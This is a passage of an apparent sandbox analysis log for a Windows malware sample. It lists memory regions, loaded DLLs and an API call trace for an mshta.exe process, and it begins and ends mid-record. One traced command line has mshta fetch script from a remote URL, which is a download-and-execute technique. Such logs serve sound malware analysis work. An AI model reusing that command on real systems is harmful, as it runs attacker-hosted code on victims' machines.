"private_0x00000000019b0000" filename = "" Region: id = 515 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 516 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 517 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 518 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 519 start_va = 0x72280000 end_va = 0x72285fff entry_point = 0x72280000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 520 start_va = 0x1cd0000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 521 start_va = 0x734e0000 end_va = 0x734effff entry_point = 0x734e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 522 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 523 start_va = 0x1b30000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 524 start_va = 0x1dd0000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 525 start_va = 0x1b30000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 526 start_va = 0x1c80000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 527 start_va 
= 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 528 start_va = 0x1b30000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 529 start_va = 0x1dd0000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 530 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 531 start_va = 0x73a90000 end_va = 0x73a9ffff entry_point = 0x73a90000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 532 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 533 start_va = 0x73a60000 end_va = 0x73a71fff entry_point = 0x73a60000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 534 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 535 start_va = 0x73a50000 end_va = 0x73a57fff entry_point = 0x73a50000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 536 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 537 start_va = 0x74b20000 end_va = 0x74b25fff 
entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 538 start_va = 0x560000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 539 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 540 start_va = 0x1f40000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 541 start_va = 0x6f530000 end_va = 0x6f589fff entry_point = 0x6f530000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 542 start_va = 0x2020000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 543 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 544 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 545 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 546 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 547 start_va = 0x75570000 end_va = 0x75572fff entry_point = 0x75570000 
region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 548 start_va = 0x2240000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 549 start_va = 0x72270000 end_va = 0x7227afff entry_point = 0x72270000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 550 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 551 start_va = 0x2430000 end_va = 0x252ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 552 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 553 start_va = 0x6e2d0000 end_va = 0x6e2d7fff entry_point = 0x6e2d0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 684 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 685 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 686 start_va = 0x17c0000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 687 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: 
"c:\\windows\\system32\\oleacc.dll") Region: id = 688 start_va = 0x540000 end_va = 0x540fff entry_point = 0x540000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 689 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 690 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 691 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 692 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 693 start_va = 0x6d270000 end_va = 0x6dceffff entry_point = 0x6d270000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 694 start_va = 0x580000 end_va = 0x581fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 764 start_va = 0x1390000 end_va = 0x13a0fff entry_point = 0x1390000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 765 start_va = 0x2530000 end_va = 0x2922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002530000" filename = "" Region: id = 766 start_va = 0x2940000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 767 start_va = 0x2b90000 end_va = 0x2c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" 
Region: id = 768 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 769 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 770 start_va = 0x6e8c0000 end_va = 0x6e971fff entry_point = 0x6e8c0000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 771 start_va = 0x71f90000 end_va = 0x71fb0fff entry_point = 0x71f90000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 772 start_va = 0x71680000 end_va = 0x71691fff entry_point = 0x71680000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 773 start_va = 0x71b50000 end_va = 0x71b79fff entry_point = 0x71b50000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 774 start_va = 0x13b0000 end_va = 0x13bbfff entry_point = 0x13b0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 775 start_va = 0x2d60000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 776 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 777 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 778 start_va = 0x13c0000 end_va = 0x13c1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013c0000" filename = "" Region: id = 779 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 780 start_va = 0x13d0000 end_va = 0x13d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 781 start_va = 0x6d030000 end_va = 0x6d267fff entry_point = 0x6d030000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 782 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 783 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 784 start_va = 0x6ee80000 end_va = 0x6eeadfff entry_point = 0x6ee80000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 785 start_va = 0x13e0000 end_va = 0x13e3fff entry_point = 0x13e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 786 start_va = 0x1840000 end_va = 0x1840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001840000" filename = "" Region: 
id = 787 start_va = 0x1850000 end_va = 0x1853fff entry_point = 0x1850000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 788 start_va = 0x1960000 end_va = 0x1984fff entry_point = 0x1960000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 789 start_va = 0x19f0000 end_va = 0x1a1ffff entry_point = 0x19f0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 790 start_va = 0x1ed0000 end_va = 0x1f35fff entry_point = 0x1ed0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 791 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 792 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = 
"\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 793 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 804 start_va = 0x2a90000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 805 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 806 start_va = 0x2c90000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 807 start_va = 0x2e20000 end_va = 0x374ffff entry_point = 0x2e20000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 18 os_tid = 0xa1c [0024.592] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x40fa84 | out: lpSystemTimeAsFileTime=0x40fa84*(dwLowDateTime=0x92b937d0, dwHighDateTime=0x1d3799e)) [0024.592] GetCurrentProcessId () returned 0xa18 [0024.592] GetCurrentThreadId () returned 0xa1c [0024.592] GetTickCount () returned 0x157cf [0024.592] QueryPerformanceCounter (in: lpPerformanceCount=0x40fa7c | out: lpPerformanceCount=0x40fa7c*=336616648) returned 1 [0024.592] GetModuleHandleA (lpModuleName=0x0) returned 0x2b0000 [0024.592] GetStartupInfoA (in: lpStartupInfo=0x40f990 | out: lpStartupInfo=0x40f990*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mShta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0024.592] GetVersionExA (in: 
lpVersionInformation=0x40f9e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f9e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0024.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c10000 [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsAlloc") returned 0x76c6418d [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsGetValue") returned 0x76c61e16 [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsSetValue") returned 0x76c676e6 [0024.593] GetProcAddress (hModule=0x76c10000, lpProcName="FlsFree") returned 0x76c61f61 [0024.593] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.593] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.593] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 
0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.594] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7526726b [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.594] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.594] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.595] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.595] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW 
(lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.596] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.596] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75260000 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x76faa295 [0024.597] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x76facd10 [0024.597] GetStartupInfoA (in: lpStartupInfo=0x40f914 | out: lpStartupInfo=0x40f914*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mShta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0024.597] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0024.597] GetStdHandle (nStdHandle=0xfffffff5) 
returned 0x0 [0024.597] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0024.598] SetHandleCount (uNumber=0x20) returned 0x20 [0024.598] GetCommandLineA () returned="mShta http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" [0024.598] GetEnvironmentStringsW () returned 0xff1b8* [0024.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1059, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1059 [0024.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1059, lpMultiByteStr=0x550e78, cbMultiByte=1059, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1059 [0024.598] FreeEnvironmentStringsW (penv=0xff1b8) returned 1 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetACP () returned 0x4e4 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f8ec | out: lpCPInfo=0x40f8ec) returned 1 [0024.598] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x40f3b8 | out: lpCPInfo=0x40f3b8) returned 1 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x40f348 | out: lpCharType=0x40f348) returned 1 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x40f138, cchWideChar=256 | out: lpWideCharStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏+Ā") returned 256 [0024.598] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏+Ā", cchSrc=256, lpCharType=0x40f3cc | out: lpCharType=0x40f3cc) returned 1 [0024.598] GetLastError () returned 0x0 [0024.598] SetLastError (dwErrCode=0x0) [0024.598] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0024.598] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x40f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 